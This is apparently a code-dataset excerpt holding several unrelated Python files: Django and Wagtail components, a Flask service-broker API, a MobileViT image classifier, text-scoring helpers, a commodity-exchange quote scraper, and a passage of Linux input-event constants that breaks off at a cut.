hexsha
stringlengths 40
40
| size
int64 4
1.02M
| ext
stringclasses 8
values | lang
stringclasses 1
value | max_stars_repo_path
stringlengths 4
209
| max_stars_repo_name
stringlengths 5
121
| max_stars_repo_head_hexsha
stringlengths 40
40
| max_stars_repo_licenses
listlengths 1
10
| max_stars_count
int64 1
191k
⌀ | max_stars_repo_stars_event_min_datetime
stringlengths 24
24
⌀ | max_stars_repo_stars_event_max_datetime
stringlengths 24
24
⌀ | max_issues_repo_path
stringlengths 4
209
| max_issues_repo_name
stringlengths 5
121
| max_issues_repo_head_hexsha
stringlengths 40
40
| max_issues_repo_licenses
listlengths 1
10
| max_issues_count
int64 1
67k
⌀ | max_issues_repo_issues_event_min_datetime
stringlengths 24
24
⌀ | max_issues_repo_issues_event_max_datetime
stringlengths 24
24
⌀ | max_forks_repo_path
stringlengths 4
209
| max_forks_repo_name
stringlengths 5
121
| max_forks_repo_head_hexsha
stringlengths 40
40
| max_forks_repo_licenses
listlengths 1
10
| max_forks_count
int64 1
105k
⌀ | max_forks_repo_forks_event_min_datetime
stringlengths 24
24
⌀ | max_forks_repo_forks_event_max_datetime
stringlengths 24
24
⌀ | content
stringlengths 4
1.02M
| avg_line_length
float64 1.07
66.1k
| max_line_length
int64 4
266k
| alphanum_fraction
float64 0.01
1
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
1ec3d3afdc62f7fedb3c502ecf2fe5c80ab5e4b3
| 1,188
|
py
|
Python
|
django/core/mail/backends/console.py
|
dolfly/django
|
a971d19bab9bfc33d301669b319b4766bf6d94f6
|
[
"BSD-3-Clause"
] | 1
|
2015-11-08T11:42:08.000Z
|
2015-11-08T11:42:08.000Z
|
django/core/mail/backends/console.py
|
dolfly/django
|
a971d19bab9bfc33d301669b319b4766bf6d94f6
|
[
"BSD-3-Clause"
] | null | null | null |
django/core/mail/backends/console.py
|
dolfly/django
|
a971d19bab9bfc33d301669b319b4766bf6d94f6
|
[
"BSD-3-Clause"
] | null | null | null |
"""
Email backend that writes messages to console instead of sending them.
"""
import sys
import threading
from django.core.mail.backends.base import BaseEmailBackend
class EmailBackend(BaseEmailBackend):
def __init__(self, *args, **kwargs):
self.stream = kwargs.pop('stream', sys.stdout)
self._lock = threading.RLock()
super(EmailBackend, self).__init__(*args, **kwargs)
def send_messages(self, email_messages):
"""Write all messages to the stream in a thread-safe way."""
if not email_messages:
return
msg_count = 0
with self._lock:
try:
stream_created = self.open()
for message in email_messages:
self.stream.write('%s\n' % message.message().as_string())
self.stream.write('-' * 79)
self.stream.write('\n')
self.stream.flush() # flush after each message
msg_count += 1
if stream_created:
self.close()
except Exception:
if not self.fail_silently:
raise
return msg_count
| 33.942857
| 77
| 0.560606
|
eb1a86266b924f8cd14adae3a02e5e1e0686e9f6
| 1,071
|
py
|
Python
|
questionnaires/migrations/0018_auto_20210929_1126.py
|
ChrisMarsh82/iogt
|
8141421a79b73bd038880a3be92fa6809adced13
|
[
"BSD-2-Clause"
] | 20
|
2021-04-29T12:36:25.000Z
|
2022-03-27T12:17:41.000Z
|
questionnaires/migrations/0018_auto_20210929_1126.py
|
ChrisMarsh82/iogt
|
8141421a79b73bd038880a3be92fa6809adced13
|
[
"BSD-2-Clause"
] | 892
|
2021-02-02T13:56:06.000Z
|
2022-03-31T11:25:44.000Z
|
questionnaires/migrations/0018_auto_20210929_1126.py
|
ChrisMarsh82/iogt
|
8141421a79b73bd038880a3be92fa6809adced13
|
[
"BSD-2-Clause"
] | 28
|
2021-02-19T19:28:37.000Z
|
2022-03-11T11:46:00.000Z
|
# Generated by Django 3.1.13 on 2021-09-29 11:26
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('questionnaires', '0017_auto_20210901_1844'),
]
operations = [
migrations.AlterField(
model_name='pollformfield',
name='clean_name',
field=models.TextField(blank=True, default='', help_text='Safe name of the form field, the label converted to ascii_snake_case', verbose_name='name'),
),
migrations.AlterField(
model_name='quizformfield',
name='clean_name',
field=models.TextField(blank=True, default='', help_text='Safe name of the form field, the label converted to ascii_snake_case', verbose_name='name'),
),
migrations.AlterField(
model_name='surveyformfield',
name='clean_name',
field=models.TextField(blank=True, default='', help_text='Safe name of the form field, the label converted to ascii_snake_case', verbose_name='name'),
),
]
| 36.931034
| 162
| 0.64239
|
a747a03155804de39e8e01967d7213cc35d8297e
| 2,702
|
py
|
Python
|
wagtail/wagtailredirects/models.py
|
seddonym/wagtail-tableblock
|
aea3ce67a0800285b20b93018b7c0a8679e479b7
|
[
"BSD-3-Clause"
] | null | null | null |
wagtail/wagtailredirects/models.py
|
seddonym/wagtail-tableblock
|
aea3ce67a0800285b20b93018b7c0a8679e479b7
|
[
"BSD-3-Clause"
] | null | null | null |
wagtail/wagtailredirects/models.py
|
seddonym/wagtail-tableblock
|
aea3ce67a0800285b20b93018b7c0a8679e479b7
|
[
"BSD-3-Clause"
] | null | null | null |
from __future__ import unicode_literals
from django.db import models
from django.utils.six.moves.urllib.parse import urlparse
from django.utils.translation import ugettext_lazy as _
class Redirect(models.Model):
old_path = models.CharField(verbose_name=_("redirect from"), max_length=255, db_index=True)
site = models.ForeignKey(
'wagtailcore.Site', verbose_name=_('site'), null=True, blank=True, related_name='redirects', db_index=True
)
is_permanent = models.BooleanField(verbose_name=_("permanent"), default=True, help_text=_(
"Recommended. Permanent redirects ensure search engines "
"forget the old page (the 'Redirect from') and index the new page instead."
))
redirect_page = models.ForeignKey('wagtailcore.Page', verbose_name=_("redirect to a page"), null=True, blank=True)
redirect_link = models.URLField(verbose_name=_("redirect to any URL"), blank=True)
@property
def title(self):
return self.old_path
@property
def link(self):
if self.redirect_page:
return self.redirect_page.url
else:
return self.redirect_link
def get_is_permanent_display(self):
if self.is_permanent:
return "permanent"
else:
return "temporary"
@classmethod
def get_for_site(cls, site=None):
if site:
return cls.objects.filter(models.Q(site=site) | models.Q(site=None))
else:
return cls.objects.all()
@staticmethod
def normalise_path(url):
# Strip whitespace
url = url.strip()
# Parse url
url_parsed = urlparse(url)
# Path must start with / but not end with /
path = url_parsed[2]
if not path.startswith('/'):
path = '/' + path
if path.endswith('/'):
path = path[:-1]
# Parameters must be sorted alphabetically
parameters = url_parsed[3]
parameters_components = parameters.split(';')
parameters = ';'.join(sorted(parameters_components))
# Query string components must be sorted alphabetically
query_string = url_parsed[4]
query_string_components = query_string.split('&')
query_string = '&'.join(sorted(query_string_components))
if parameters:
path = path + ';' + parameters
# Add query string to path
if query_string:
path = path + '?' + query_string
return path
def clean(self):
# Normalise old path
self.old_path = Redirect.normalise_path(self.old_path)
class Meta:
verbose_name = _('redirect')
unique_together = [('old_path', 'site')]
| 31.418605
| 118
| 0.633605
|
fab083cb35c21a17c51c7e72f52eb1d0f8db5ad2
| 3,397
|
py
|
Python
|
server.py
|
Dew-bench/service-broker
|
5f4de5ae92a46ef285ef4e58e2fd9744aca72ff2
|
[
"Unlicense"
] | null | null | null |
server.py
|
Dew-bench/service-broker
|
5f4de5ae92a46ef285ef4e58e2fd9744aca72ff2
|
[
"Unlicense"
] | null | null | null |
server.py
|
Dew-bench/service-broker
|
5f4de5ae92a46ef285ef4e58e2fd9744aca72ff2
|
[
"Unlicense"
] | null | null | null |
from flask import Flask, request
import socket
import json
import requests
app = Flask(__name__)
CONSUMERS = {}
PROVIDERS = {}
SERVICES = {}
PROVIDER_SETTINGS = {} # TODO
PROVIDER_URL = ""
######################################
@app.route('/')
def hello_world():
return 'Service broker'
@app.route('/api/ip')
def get_ip():
h_name = socket.gethostname()
IP_addres = socket.gethostbyname(h_name)
return json.dumps({
"host_name": h_name,
"ip": IP_addres
})
######################################
# @app.route('/api/consumer/register', methods=['POST', 'PUT'])
# def add_device():
# data = request.get_json()
# CONSUMERS[data['url']] = data
# return "ok"
# @app.route('/api/consumer/unregister', methods=['POST', 'PUT'])
# def remove_device():
# data = request.get_json()
# CONSUMERS.pop(data['url'])
# return "ok"
# @app.route('/api/consumer/list', methods=['GET'])
# def list_device():
# return json.dumps(CONSUMERS)
######################################
# @app.route('/api/provider/register', methods=['POST', 'PUT'])
# def add_device():
# data = request.get_json()
# PROVIDERS[data['url']] = data
# return "ok"
# @app.route('/api/provider/unregister', methods=['POST', 'PUT'])
# def remove_device():
# data = request.get_json()
# PROVIDERS.pop(data['url'])
# return "ok"
# @app.route('/api/provider/list', methods=['GET'])
# def list_device():
# return json.dumps(PROVIDERS)
######################################
@app.route('/api/provider/register', methods=['POST', 'PUT'])
def add_device():
data = request.get_json()
global PROVIDER_URL
PROVIDER_URL = data['url']
return "ok"
@app.route('/api/provider/list', methods=['GET'])
def list_device():
return json.dumps(PROVIDER_URL)
######################################
@app.route('/api/service/request', methods=['POST', 'PUT'])
def add_depl():
data = request.get_json()
print(data)
try:
r = requests.put("{}/api/service/add".format(PROVIDER_URL), json=data)
print(r.content)
except:
print("exception")
# SERVICES[data['id']] = data
return "ok"
@app.route('/api/service/remove', methods=['POST', 'PUT'])
def remove_depl():
data = request.get_json()
try:
print(data)
r = requests.put("{}/api/service/remove".format(PROVIDER_URL), json=data)
print(r.content)
except:
print("exception")
# SERVICES.pop(data['id'])
return "ok"
@app.route('/api/service/url', methods=['POST', 'PUT'])
def url_depl():
data = request.get_json()
try:
print(data)
r = requests.put("{}/api/service/url".format(PROVIDER_URL), json=data)
print(r.content)
except:
print("exception")
# SERVICES.pop(data['id'])
return r
@app.route('/api/service/list', methods=['GET'])
def list_depl():
return json.dumps(SERVICES)
# ######################################
# @app.route('/api/provider/settings', methods=['POST', 'PUT'])
# def add_broker():
# data = request.get_json()
# PROVIDER_SETTINGS[data['id']] = data
# return "ok"
# @app.route('/api/provider/list/settings', methods=['GET'])
# def list_brokers():
# return json.dumps(BROKERS)
# ######################################
if __name__ == '__main__':
app.run(debug=True, host='0.0.0.0', port=5000)
| 24.264286
| 81
| 0.564616
|
afce703cfdcd5c911f2e36badc9f0a58dcb97c77
| 10,133
|
py
|
Python
|
cvnets/models/classification/mobilevit.py
|
apple/ml-cvnets
|
84d992f413e52c0468f86d23196efd9dad885e6f
|
[
"AML"
] | 209
|
2021-10-30T08:32:10.000Z
|
2022-03-31T16:18:03.000Z
|
cvnets/models/classification/mobilevit.py
|
apple/ml-cvnets
|
84d992f413e52c0468f86d23196efd9dad885e6f
|
[
"AML"
] | 12
|
2021-12-04T10:47:11.000Z
|
2022-03-31T15:39:40.000Z
|
cvnets/models/classification/mobilevit.py
|
apple/ml-cvnets
|
84d992f413e52c0468f86d23196efd9dad885e6f
|
[
"AML"
] | 50
|
2021-11-01T08:15:02.000Z
|
2022-03-29T08:17:34.000Z
|
#
# For licensing see accompanying LICENSE file.
# Copyright (C) 2022 Apple Inc. All Rights Reserved.
#
from torch import nn
import argparse
from typing import Dict, Tuple, Optional
from utils import logger
from . import register_cls_models
from .base_cls import BaseEncoder
from .config.mobilevit import get_configuration
from ...layers import ConvLayer, LinearLayer, GlobalPool, Dropout, SeparableConv
from ...modules import InvertedResidual, MobileViTBlock
@register_cls_models("mobilevit")
class MobileViT(BaseEncoder):
"""
This class implements the `MobileViT architecture <https://arxiv.org/abs/2110.02178?context=cs.LG>`_
"""
def __init__(self, opts, *args, **kwargs) -> None:
num_classes = getattr(opts, "model.classification.n_classes", 1000)
classifier_dropout = getattr(
opts, "model.classification.classifier_dropout", 0.0
)
pool_type = getattr(opts, "model.layer.global_pool", "mean")
image_channels = 3
out_channels = 16
mobilevit_config = get_configuration(opts=opts)
super().__init__(*args, **kwargs)
# store model configuration in a dictionary
self.model_conf_dict = dict()
self.conv_1 = ConvLayer(
opts=opts,
in_channels=image_channels,
out_channels=out_channels,
kernel_size=3,
stride=2,
use_norm=True,
use_act=True,
)
self.model_conf_dict["conv1"] = {"in": image_channels, "out": out_channels}
in_channels = out_channels
self.layer_1, out_channels = self._make_layer(
opts=opts, input_channel=in_channels, cfg=mobilevit_config["layer1"]
)
self.model_conf_dict["layer1"] = {"in": in_channels, "out": out_channels}
in_channels = out_channels
self.layer_2, out_channels = self._make_layer(
opts=opts, input_channel=in_channels, cfg=mobilevit_config["layer2"]
)
self.model_conf_dict["layer2"] = {"in": in_channels, "out": out_channels}
in_channels = out_channels
self.layer_3, out_channels = self._make_layer(
opts=opts, input_channel=in_channels, cfg=mobilevit_config["layer3"]
)
self.model_conf_dict["layer3"] = {"in": in_channels, "out": out_channels}
in_channels = out_channels
self.layer_4, out_channels = self._make_layer(
opts=opts,
input_channel=in_channels,
cfg=mobilevit_config["layer4"],
dilate=self.dilate_l4,
)
self.model_conf_dict["layer4"] = {"in": in_channels, "out": out_channels}
in_channels = out_channels
self.layer_5, out_channels = self._make_layer(
opts=opts,
input_channel=in_channels,
cfg=mobilevit_config["layer5"],
dilate=self.dilate_l5,
)
self.model_conf_dict["layer5"] = {"in": in_channels, "out": out_channels}
in_channels = out_channels
exp_channels = min(mobilevit_config["last_layer_exp_factor"] * in_channels, 960)
self.conv_1x1_exp = ConvLayer(
opts=opts,
in_channels=in_channels,
out_channels=exp_channels,
kernel_size=1,
stride=1,
use_act=True,
use_norm=True,
)
self.model_conf_dict["exp_before_cls"] = {
"in": in_channels,
"out": exp_channels,
}
self.classifier = nn.Sequential()
self.classifier.add_module(
name="global_pool", module=GlobalPool(pool_type=pool_type, keep_dim=False)
)
if 0.0 < classifier_dropout < 1.0:
self.classifier.add_module(
name="dropout", module=Dropout(p=classifier_dropout, inplace=True)
)
self.classifier.add_module(
name="fc",
module=LinearLayer(
in_features=exp_channels, out_features=num_classes, bias=True
),
)
# check model
self.check_model()
# weight initialization
self.reset_parameters(opts=opts)
@classmethod
def add_arguments(cls, parser: argparse.ArgumentParser) -> argparse.ArgumentParser:
group = parser.add_argument_group(
title="".format(cls.__name__), description="".format(cls.__name__)
)
group.add_argument(
"--model.classification.mit.mode",
type=str,
default="small",
choices=["xx_small", "x_small", "small"],
help="MobileViT mode. Defaults to small",
)
group.add_argument(
"--model.classification.mit.attn-dropout",
type=float,
default=0.0,
help="Dropout in attention layer. Defaults to 0.0",
)
group.add_argument(
"--model.classification.mit.ffn-dropout",
type=float,
default=0.0,
help="Dropout between FFN layers. Defaults to 0.0",
)
group.add_argument(
"--model.classification.mit.dropout",
type=float,
default=0.0,
help="Dropout in Transformer layer. Defaults to 0.0",
)
group.add_argument(
"--model.classification.mit.transformer-norm-layer",
type=str,
default="layer_norm",
help="Normalization layer in transformer. Defaults to LayerNorm",
)
group.add_argument(
"--model.classification.mit.no-fuse-local-global-features",
action="store_true",
help="Do not combine local and global features in MobileViT block",
)
group.add_argument(
"--model.classification.mit.conv-kernel-size",
type=int,
default=3,
help="Kernel size of Conv layers in MobileViT block",
)
group.add_argument(
"--model.classification.mit.head-dim",
type=int,
default=None,
help="Head dimension in transformer",
)
group.add_argument(
"--model.classification.mit.number-heads",
type=int,
default=None,
help="Number of heads in transformer",
)
return parser
def _make_layer(
self,
opts,
input_channel,
cfg: Dict,
dilate: Optional[bool] = False,
*args,
**kwargs
) -> Tuple[nn.Sequential, int]:
block_type = cfg.get("block_type", "mobilevit")
if block_type.lower() == "mobilevit":
return self._make_mit_layer(
opts=opts, input_channel=input_channel, cfg=cfg, dilate=dilate
)
else:
return self._make_mobilenet_layer(
opts=opts, input_channel=input_channel, cfg=cfg
)
@staticmethod
def _make_mobilenet_layer(
opts, input_channel: int, cfg: Dict, *args, **kwargs
) -> Tuple[nn.Sequential, int]:
output_channels = cfg.get("out_channels")
num_blocks = cfg.get("num_blocks", 2)
expand_ratio = cfg.get("expand_ratio", 4)
block = []
for i in range(num_blocks):
stride = cfg.get("stride", 1) if i == 0 else 1
layer = InvertedResidual(
opts=opts,
in_channels=input_channel,
out_channels=output_channels,
stride=stride,
expand_ratio=expand_ratio,
)
block.append(layer)
input_channel = output_channels
return nn.Sequential(*block), input_channel
def _make_mit_layer(
self,
opts,
input_channel,
cfg: Dict,
dilate: Optional[bool] = False,
*args,
**kwargs
) -> Tuple[nn.Sequential, int]:
prev_dilation = self.dilation
block = []
stride = cfg.get("stride", 1)
if stride == 2:
if dilate:
self.dilation *= 2
stride = 1
layer = InvertedResidual(
opts=opts,
in_channels=input_channel,
out_channels=cfg.get("out_channels"),
stride=stride,
expand_ratio=cfg.get("mv_expand_ratio", 4),
dilation=prev_dilation,
)
block.append(layer)
input_channel = cfg.get("out_channels")
head_dim = cfg.get("head_dim", 32)
transformer_dim = cfg["transformer_channels"]
ffn_dim = cfg.get("ffn_dim")
if head_dim is None:
num_heads = cfg.get("num_heads", 4)
if num_heads is None:
num_heads = 4
head_dim = transformer_dim // num_heads
if transformer_dim % head_dim != 0:
logger.error(
"Transformer input dimension should be divisible by head dimension. "
"Got {} and {}.".format(transformer_dim, head_dim)
)
block.append(
MobileViTBlock(
opts=opts,
in_channels=input_channel,
transformer_dim=transformer_dim,
ffn_dim=ffn_dim,
n_transformer_blocks=cfg.get("transformer_blocks", 1),
patch_h=cfg.get("patch_h", 2),
patch_w=cfg.get("patch_w", 2),
dropout=getattr(opts, "model.classification.mit.dropout", 0.1),
ffn_dropout=getattr(opts, "model.classification.mit.ffn_dropout", 0.0),
attn_dropout=getattr(
opts, "model.classification.mit.attn_dropout", 0.1
),
head_dim=head_dim,
no_fusion=getattr(
opts,
"model.classification.mit.no_fuse_local_global_features",
False,
),
conv_ksize=getattr(
opts, "model.classification.mit.conv_kernel_size", 3
),
)
)
return nn.Sequential(*block), input_channel
| 33.442244
| 104
| 0.566861
|
44f2ce8a09c1728070aee4416554f8de70a92af9
| 2,161
|
py
|
Python
|
src/models/CCIG/data/sentence_score.py
|
stillyuyi/ArticlePairMatching
|
f9cf63ad4c398d377f3d0291f552fb99f81020ef
|
[
"BSD-3-Clause"
] | 227
|
2019-05-22T14:10:55.000Z
|
2022-03-31T07:39:31.000Z
|
src/models/CCIG/data/sentence_score.py
|
stillyuyi/ArticlePairMatching
|
f9cf63ad4c398d377f3d0291f552fb99f81020ef
|
[
"BSD-3-Clause"
] | 35
|
2019-06-18T07:39:28.000Z
|
2021-11-19T03:51:07.000Z
|
src/models/CCIG/data/sentence_score.py
|
stillyuyi/ArticlePairMatching
|
f9cf63ad4c398d377f3d0291f552fb99f81020ef
|
[
"BSD-3-Clause"
] | 62
|
2019-06-14T07:10:30.000Z
|
2022-02-04T19:59:32.000Z
|
# coding=utf-8
"""
This file contains functions that assign a sentence
in a document a weight score.
"""
import math
from sklearn.feature_extraction.text import TfidfTransformer, CountVectorizer
import networkx as nx
from config import *
from util.tfidf_utils import *
def tfidf(sentence, idf_dict):
tfidf_dict = gen_tf(sentence, idf_dict)
weight = sum(tfidf_dict.values())
return weight
def num_ner(sentence, ners):
return len(set(str(sentence).split()).intersection(set(ners)))
def contain_number(sentence):
if any(char.isdigit() for char in sentence):
return 1.0
else:
return 0.0
def score_sentence_length(sentence):
return len(str(sentence).split())
def score_sentence_position(paragraph_idx, sentence_idx, alpha, beta):
return math.exp(-alpha * paragraph_idx) * math.exp(-beta * sentence_idx)
def resemblance_to_title(sentence, title):
str1 = set(str(sentence).split())
str2 = set(str(title).split())
if len(str1) == 0 or len(str2) == 0:
return 0.0
return float(len(str1 & str2)) / len(str2)
def textrank(sentences):
"""
Given input text, split sentences and calc text rank score.
:param sentences: input sentence list
:return: a dictionary of (sentence index, sentence score)
"""
bow_matrix = CountVectorizer().fit_transform(sentences)
normalized = TfidfTransformer().fit_transform(bow_matrix)
similarity_graph = normalized * normalized.T
nx_graph = nx.from_scipy_sparse_matrix(similarity_graph)
scores = nx.pagerank(nx_graph)
return dict(((i, scores[i]) for i, s in enumerate(sentences)))
if __name__ == "__main__":
sentence = "中国 人民 1"
title = "中国 和 人民"
ner = ["中国"]
# print num_ner(sentence, ner)
# print contain_number(sentence)
# print score_sentence_length(sentence)
# print score_sentence_position(1, 1, 1, 1)
# print resemblance_to_title(sentence, title)
# ALPHA = 0.1
# BETA = 0.3
# idxs1 = [0, 1, 2]
# print [score_sentence_position(0, s_idx1, ALPHA, BETA) for s_idx1 in idxs1]
# print sum([score_sentence_position(0, s_idx1, ALPHA, BETA) for s_idx1 in idxs1])
| 29.202703
| 86
| 0.694586
|
ac982cf60c36562419f704f3048b6ed47dc24e14
| 3,655
|
py
|
Python
|
Market/market_DL.py
|
Alan-Du/Commodity_Tracker
|
fc7d4c92535424be7dc82f47dd513332b4b772c9
|
[
"Unlicense"
] | 1
|
2020-04-12T22:32:01.000Z
|
2020-04-12T22:32:01.000Z
|
Market/market_DL.py
|
Alan-Du/Commodity_Tracker
|
fc7d4c92535424be7dc82f47dd513332b4b772c9
|
[
"Unlicense"
] | null | null | null |
Market/market_DL.py
|
Alan-Du/Commodity_Tracker
|
fc7d4c92535424be7dc82f47dd513332b4b772c9
|
[
"Unlicense"
] | 1
|
2021-06-11T09:19:12.000Z
|
2021-06-11T09:19:12.000Z
|
"""
Created on Sun Sep 22 08:24:36 2019
@author: shaolun du
@contact: Shaolun.du@gmail.com
Structure outline:
HTML page with pandas read html parser
"""
import requests
import pandas as pd
from Market.exc_parser import exc_parser
from Market.gen_process_params import gen_proc_params
class DL_parser(exc_parser):
""" Shanghai exchange parser
"""
def __init__( self ):
self.__col_names = ["Dates","Code","Open","High","Low","Close","OPI","Vol"]
self.__exc_name = "DL"
self.__URL_TEMPL = "http://www.dce.com.cn/publicweb/quotesdata/dayQuotesCh.html"
self.__headers = { 'Content-Type': 'application/x-www-form-urlencoded',
'Cookie': 'JSESSIONID=34581314E8E6F047ABE7D22180DCE3A2; WMONID=-b8uBX4vHDi; Hm_lvt_a50228174de2a93aee654389576b60fb=1567732473,1568333912,1568936184,1569113640; Hm_lpvt_a50228174de2a93aee654389576b60fb=1569113660',
'Referer': 'http://www.dce.com.cn/publicweb/quotesdata/dayQuotesCh.html',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36'
}
self.__payload = { 'dayQuotes.variety': 'all',
'dayQuotes.trade_type': '0',
'year': 0,
'month':0,
'day': 0,
}
self.__name_map = {"豆一":"a","豆二":"b","乙二醇":"eg","焦煤":"jm","焦炭":"j",
"铁矿石":"i","聚氯乙烯":"pvc","聚丙烯":"pp","聚乙烯":"pe","豆粕":"m",
"豆油":"y","棕榈油":"p","鸡蛋":"jd","玉米淀粉":"cs","玉米":"c"}
self.__datas = []
def _get_URL_TEMP(self):
# update exchange url
return self.__URL_TEMPL
def _read_html_format(self,page,dates):
df = pd.read_html(page,skiprows=0)[0]
df.iloc[:,0] = df.iloc[:,0].map(self.__name_map)
df = df.dropna()
df["Dates"] = str(dates[0])+"{:02d}".format(dates[1]+1)+"{:02d}".format(dates[2])
df["Code"] = df.iloc[:,0]+df.iloc[:,1].astype(int).astype(str)
df["Open"] = df.iloc[:,2]
df["High"] = df.iloc[:,3]
df["Low"] = df.iloc[:,4]
df["Close"] = df.iloc[:,5]
df["OPI"] = df.iloc[:,11]
df["Vol"] = df.iloc[:,10]
df = df[["Dates","Code","Open","High","Low","Close","OPI","Vol"]]
return df
def _download(self,sdate,edate):
print("Exchange DL--->")
# Start downloading given period
dates_li = gen_proc_params(self.__exc_name,sdate,edate)
ans = pd.DataFrame()
with requests.Session() as s:
# Open request session
for dates in dates_li:
print(dates)
self.__payload['year'] = dates[0]
self.__payload['month'] = dates[1]
self.__payload['day'] = dates[2]
page = s.post( self.__URL_TEMPL, data=self.__payload, headers=self.__headers).text
try:
df = self._read_html_format(page,dates)
except:
continue
ans = ans.append(df)
self.__datas = ans
def _get_data_df(self):
# Convert output format
self.__datas = self.__datas.dropna()
self.__datas["Dates"] = pd.to_datetime(self.__datas["Dates"]).dt.date
self.__datas = self.__datas.set_index("Dates")
self.__datas["Code"] = self.__datas["Code"].astype(str)
return self.__datas
| 46.265823
| 244
| 0.533242
|
d789521bd0d81779168834374e73aaa5d9121452
| 1,991
|
py
|
Python
|
videoanalyst/data/dataset/dataset_impl/trackingnet.py
|
yutliu/betterSAT
|
fb983f43b12352f9ee6ae40b4e0954f6ba502fb8
|
[
"MIT"
] | 2
|
2020-07-30T08:26:08.000Z
|
2020-11-24T07:40:46.000Z
|
videoanalyst/data/dataset/dataset_impl/trackingnet.py
|
shartoo/video_analyst
|
db7c1b323f26ec19533a4b19804cf2c8a52643e5
|
[
"MIT"
] | null | null | null |
videoanalyst/data/dataset/dataset_impl/trackingnet.py
|
shartoo/video_analyst
|
db7c1b323f26ec19533a4b19804cf2c8a52643e5
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
import os.path as osp
from typing import Dict
import cv2
import numpy as np
from loguru import logger
from yacs.config import CfgNode
from videoanalyst.data.dataset.dataset_base import TRACK_DATASETS, DatasetBase
from videoanalyst.evaluation.got_benchmark.datasets import TrackingNet
from videoanalyst.pipeline.utils.bbox import xywh2xyxy
_current_dir = osp.dirname(osp.realpath(__file__))
@TRACK_DATASETS.register
class TrackingNetDataset(DatasetBase):
r"""
ILSVRC2015-VID dataset helper
Hyper-parameters
----------------
dataset_root: str
path to root of the dataset
subset: str
dataset split name (train|val|train_val)
ratio: float
dataset ratio. used by sampler (data.sampler).
max_diff: int
maximum difference in index of a pair of sampled frames
check_integrity: bool
if check integrity of dataset or not
"""
default_hyper_params = dict(
dataset_root="datasets/TrackingNet",
subset="train",
ratio=1.0,
max_diff=100,
check_integrity=True,
)
def __init__(self) -> None:
super(TrackingNetDataset, self).__init__()
self._state["dataset"] = None
def update_params(self):
r"""
an interface for update params
"""
dataset_root = osp.realpath(self._hyper_params["dataset_root"])
subset = self._hyper_params["subset"]
check_integrity = self._hyper_params["check_integrity"]
cache_dir = osp.join(dataset_root, "cache/vid")
self._state["dataset"] = TrackingNet(
dataset_root,
subset=subset,
# cache_dir=cache_dir,
)
def __getitem__(self, item: int) -> Dict:
img_files, anno = self._state["dataset"][item]
anno = xywh2xyxy(anno)
sequence_data = dict(image=img_files, anno=anno)
return sequence_data
def __len__(self):
return len(self._state["dataset"])
| 28.442857
| 78
| 0.657459
|
a2a5c572ace96a2050c5e738be099b29e5352570
| 18,473
|
py
|
Python
|
core/pycopia/OS/Linux/event.py
|
kdart/pycopia3
|
8a7c820f096245411eabbb72345e4f30a35988b6
|
[
"Apache-2.0"
] | 3
|
2018-11-26T15:00:20.000Z
|
2022-01-28T23:17:58.000Z
|
core/pycopia/OS/Linux/event.py
|
kdart/pycopia3
|
8a7c820f096245411eabbb72345e4f30a35988b6
|
[
"Apache-2.0"
] | null | null | null |
core/pycopia/OS/Linux/event.py
|
kdart/pycopia3
|
8a7c820f096245411eabbb72345e4f30a35988b6
|
[
"Apache-2.0"
] | 1
|
2018-11-26T15:00:21.000Z
|
2018-11-26T15:00:21.000Z
|
#!/usr/bin/python3.4
# vim:ts=4:sw=4:softtabstop=4:smarttab:expandtab
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Interface to produce Linux event stream from ascii data.
"""
from pycopia.fsm import FSM
from pycopia import ascii
from pycopia.OS import scheduler
# meta modifiers for tables
SHIFT = 0x200
ALT = 0x400
META = 0x800
COMPOSE = 0x1000
# from <linux/input.h>
# * Event types
EV_SYN = 0x00
EV_KEY = 0x01
EV_REL = 0x02
EV_ABS = 0x03
EV_MSC = 0x04
EV_SW = 0x05
EV_LED = 0x11
EV_SND = 0x12
EV_REP = 0x14
EV_FF = 0x15
EV_PWR = 0x16
EV_FF_STATUS = 0x17
EV_MAX = 0x1f
# * Synchronization events.
SYN_REPORT = 0
SYN_CONFIG = 1
# * Keys and buttons
KEY_RESERVED = 0
KEY_ESC = 1
KEY_1 = 2
KEY_2 = 3
KEY_3 = 4
KEY_4 = 5
KEY_5 = 6
KEY_6 = 7
KEY_7 = 8
KEY_8 = 9
KEY_9 = 10
KEY_0 = 11
KEY_MINUS = 12
KEY_EQUAL = 13
KEY_BACKSPACE = 14
KEY_TAB = 15
KEY_Q = 16
KEY_W = 17
KEY_E = 18
KEY_R = 19
KEY_T = 20
KEY_Y = 21
KEY_U = 22
KEY_I = 23
KEY_O = 24
KEY_P = 25
KEY_LEFTBRACE = 26
KEY_RIGHTBRACE = 27
KEY_ENTER = 28
KEY_LEFTCTRL = 29
KEY_A = 30
KEY_S = 31
KEY_D = 32
KEY_F = 33
KEY_G = 34
KEY_H = 35
KEY_J = 36
KEY_K = 37
KEY_L = 38
KEY_SEMICOLON = 39
KEY_APOSTROPHE = 40
KEY_GRAVE = 41
KEY_LEFTSHIFT = 42
KEY_BACKSLASH = 43
KEY_Z = 44
KEY_X = 45
KEY_C = 46
KEY_V = 47
KEY_B = 48
KEY_N = 49
KEY_M = 50
KEY_COMMA = 51
KEY_DOT = 52
KEY_SLASH = 53
KEY_RIGHTSHIFT = 54
KEY_KPASTERISK = 55
KEY_LEFTALT = 56
KEY_SPACE = 57
KEY_CAPSLOCK = 58
KEY_F1 = 59
KEY_F2 = 60
KEY_F3 = 61
KEY_F4 = 62
KEY_F5 = 63
KEY_F6 = 64
KEY_F7 = 65
KEY_F8 = 66
KEY_F9 = 67
KEY_F10 = 68
KEY_NUMLOCK = 69
KEY_SCROLLLOCK = 70
KEY_KP7 = 71
KEY_KP8 = 72
KEY_KP9 = 73
KEY_KPMINUS = 74
KEY_KP4 = 75
KEY_KP5 = 76
KEY_KP6 = 77
KEY_KPPLUS = 78
KEY_KP1 = 79
